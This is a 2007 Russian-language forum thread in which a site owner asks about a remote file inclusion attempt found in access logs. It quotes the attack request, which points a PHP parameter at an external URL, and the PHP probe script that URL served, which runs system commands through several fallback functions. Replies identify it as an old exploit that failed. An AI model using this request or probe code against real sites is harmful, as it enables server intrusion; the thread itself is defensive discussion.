|
|
|
| Обнаружил в логах обращений такой запрос:
206.51.224.144 - - [17/Sep/2007:01:04:31 +0400] "GET /lib/top.php?SID=http://www.vesprokat.ru/nav? HTTP/1.1" 302 20 "-" "libwww-perl/5.808"
Повторяется неоднократно, с разных IP. Сходил на http://www.vesprokat.ru/nav?, и мне браузер тупо отобразил такой код:
<?
$ker = @php_uname();
$osx = @PHP_OS;
echo "f7f32504cabcb48c21030c024c6e5c1a<br>";
echo "<h2>SysOSx:$ker</h2></br>";
echo "<h2>SysOSx:$osx</h2></br>";
if ($osx == "WINNT") { $xeQt="ipconfig -a"; }
else { $xeQt="id"; }
$hitemup=ex($xeQt);
echo $hitemup;
function ex($cfe)
{
$res = '';
if (!empty($cfe))
{
if(function_exists('exec'))
{
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($cfe);
}
elseif(function_exists('system'))
{
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
?>
Чем это мне может грозить,?
|
| |
|
|
|
|
|
|
|
для: Loneliness
(17.09.2007 в 11:57)
| | Полным крахом вашего сайта ;) | |
|
|
|
|
|
|
|
для: Loneliness
(17.09.2007 в 11:57)
| | Это попытка применить эксплоит, однако, достаточно древний - вряд ли он сработает у вас. | |
|
|
|
|
|
|
|
для: cheops
(18.09.2007 в 10:34)
| | Да, действительно, он не сработал. И хостер этого хакера аккаунт заблокировал по моей заявке. | |
|
|
|